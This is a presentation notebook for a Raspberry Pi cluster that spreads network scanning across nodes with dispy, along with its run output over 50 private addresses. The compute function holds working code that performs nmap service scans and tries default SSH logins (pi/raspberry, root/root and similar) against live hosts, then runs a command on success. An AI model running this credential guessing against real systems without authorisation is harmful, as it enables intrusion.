Raspberry Pi Cluster Network Scanning

Notebook for presentation purposes.

compute()

This is the function that is being run on the invidividual nodes. For a more in depth look, please look at SingleDemo.ipynb.

In [1]:
def compute(hostname):
    import os
    if (os.system("ping -c 1 -w 1 " + hostname)) == 0:
        valid = "alive"
        from libnmap.process import NmapProcess
        from libnmap.parser import NmapParser
        nmproc = NmapProcess(hostname, "-sV")
        rc = nmproc.run()
        parsed = NmapParser.parse(nmproc.stdout)
        host = parsed.hosts[0]
        services = []
        status = "Unknown"
        cracked = False
        for serv in host.services:
            services.append(str(serv.port) + "/" + str(serv.service))
            if serv.port == 22:
                import paramiko
                client = paramiko.client.SSHClient()
                client.load_system_host_keys()
                client.set_missing_host_key_policy(paramiko.WarningPolicy)
                uid_list=["pi","odroid","root","admin"]
                pwd_list=["raspberry","odroid","root","admin","password"]
                for uid in uid_list:
                    for pwd in pwd_list:
                        try:
                            if cracked == False:
                                client.connect(hostname,username=uid,password=pwd)
                                stdin, stdout, stderr = client.exec_command('ls -l')
                                status = "Poor SSH Credentials"
                                print("PWNNEEDDDD!!!!")
                                cracked = True
                        except:
                            print("failed to pwn")
                            status = "Unknown"
                client.close()
        import pyrebase
        config = {
            "apiKey": "",
            "authDomain": "clusterscanner.firebaseio.com",
            "databaseURL": "https://clusterscanner.firebaseio.com/",
            "storageBucket": "clusterscanner.appspot.com"
        }
        firebase = pyrebase.initialize_app(config)
        auth = firebase.auth()
        user = auth.sign_in_with_email_and_password("[email protected]", "")
        db = firebase.database()  # reference to the database service
        hoststruct = hostname.split(".")
        data = {"hostname": hostname,
                "services": services,
                "status": status}
        results = db.child(hoststruct[0]).child(hoststruct[1]).child(
            hoststruct[2]).child(hoststruct[3]).set(data, user['idToken'])
    else:
        valid = "dead"
    return (hostname, valid)

Cluster

First we import dispy, a Python framework for distributed computing.

In [2]:
import dispy

Setup worker nodes, cluster and monitoring tool

In [3]:
workers = ['169.254.102.163', '169.254.116.199',
           '169.254.114.226', '169.254.156.34']

cluster = dispy.JobCluster(compute, nodes=workers, ip_addr='169.254.148.126')

import dispy.httpd, time
http_server = dispy.httpd.DispyHTTPServer(cluster)
2017-12-16 20:09:50 pycos - version 4.6.5 with epoll I/O notifier
2017-12-16 20:09:50 dispy - dispy client version: 4.8.3
2017-12-16 20:09:50 dispy - Storing fault recovery information in "_dispy_20171216200950"
2017-12-16 20:09:51 dispy - Started HTTP server at ('0.0.0.0', 8181)

We can now prepare our jobs (range of IP address)

After preparing our job, we give the cluster 2 seconds to make sure everything is initialised properly. Then we check the status of the cluster.

In [4]:
jobs = []
test_range = []
for i in range(0, 1):
    for j in range(150, 200):
        test_range.append("172.22." + str(i) + "." + str(j))
print("Testing " + str(len(test_range)) + " hostnames")

time.sleep(2)
cluster.print_status()
Testing 50 hostnames

                           Node |  CPUs |    Jobs |    Sec/Job | Node Time Sec
------------------------------------------------------------------------------
 169.254.116.199 (p2)           |     1 |       0 |      0.000 |         0.000
 169.254.102.163 (p1)           |     1 |       0 |      0.000 |         0.000
 169.254.114.226 (p3)           |     1 |       0 |      0.000 |         0.000
 169.254.156.34 (p4)            |     1 |       0 |      0.000 |         0.000

Total job time: 0.000 sec, wall time: 7.525 sec, speedup: 0.000

Showtime!

Let's set the cluster on our jobs.

In [5]:
start = time.time()

for i, address in enumerate(test_range):
    job = cluster.submit(address)
    job.id = i
    jobs.append(job)

for job in jobs:
    try:
        hostname, valid = job()  # waits for job to finish and returns results
        print(job.ip_addr + ": " + hostname + " is " + valid + ".")
    except Exception as e:
        print(str(job) + " failed: " + str(e))

end = time.time()
cluster.print_status()
http_server.shutdown()
cluster.close()

print("")
print("Total time taken = " + str(end - start))
169.254.116.199: 172.22.0.150 is dead.
169.254.102.163: 172.22.0.151 is dead.
169.254.114.226: 172.22.0.152 is dead.
169.254.156.34: 172.22.0.153 is dead.
169.254.114.226: 172.22.0.154 is dead.
169.254.102.163: 172.22.0.155 is dead.
169.254.156.34: 172.22.0.156 is dead.
169.254.116.199: 172.22.0.157 is dead.
169.254.114.226: 172.22.0.158 is dead.
169.254.156.34: 172.22.0.159 is dead.
169.254.116.199: 172.22.0.160 is dead.
169.254.102.163: 172.22.0.161 is dead.
169.254.114.226: 172.22.0.162 is dead.
169.254.156.34: 172.22.0.163 is dead.
169.254.102.163: 172.22.0.164 is dead.
169.254.116.199: 172.22.0.165 is dead.
169.254.114.226: 172.22.0.166 is alive.
169.254.156.34: 172.22.0.167 is dead.
169.254.102.163: 172.22.0.168 is dead.
169.254.116.199: 172.22.0.169 is dead.
169.254.102.163: 172.22.0.170 is dead.
169.254.156.34: 172.22.0.171 is dead.
169.254.116.199: 172.22.0.172 is dead.
169.254.102.163: 172.22.0.173 is dead.
169.254.156.34: 172.22.0.174 is dead.
169.254.116.199: 172.22.0.175 is dead.
169.254.102.163: 172.22.0.176 is dead.
169.254.156.34: 172.22.0.177 is dead.
169.254.116.199: 172.22.0.178 is dead.
169.254.102.163: 172.22.0.179 is dead.
169.254.156.34: 172.22.0.180 is dead.
169.254.116.199: 172.22.0.181 is dead.
169.254.102.163: 172.22.0.182 is dead.
169.254.156.34: 172.22.0.183 is dead.
169.254.116.199: 172.22.0.184 is dead.
169.254.102.163: 172.22.0.185 is dead.
169.254.156.34: 172.22.0.186 is dead.
169.254.116.199: 172.22.0.187 is dead.
169.254.102.163: 172.22.0.188 is dead.
169.254.156.34: 172.22.0.189 is dead.
169.254.116.199: 172.22.0.190 is dead.
169.254.102.163: 172.22.0.191 is dead.
169.254.156.34: 172.22.0.192 is dead.
169.254.116.199: 172.22.0.193 is dead.
169.254.102.163: 172.22.0.194 is dead.
169.254.116.199: 172.22.0.195 is dead.
169.254.156.34: 172.22.0.196 is dead.
169.254.102.163: 172.22.0.197 is dead.
169.254.116.199: 172.22.0.198 is dead.
169.254.156.34: 172.22.0.199 is dead.

                           Node |  CPUs |    Jobs |    Sec/Job | Node Time Sec
------------------------------------------------------------------------------
 169.254.116.199 (p2)           |     1 |      15 |      1.141 |        17.108
 169.254.102.163 (p1)           |     1 |      15 |      1.073 |        16.094
 169.254.114.226 (p3)           |     1 |       5 |      7.621 |        38.105
 169.254.156.34 (p4)            |     1 |      15 |      1.141 |        17.120

Total job time: 88.426 sec, wall time: 49.949 sec, speedup: 1.770

2017-12-16 20:10:40 dispy - HTTP server waiting for 10 seconds for client updates before quitting

Total time taken = 38.355035066604614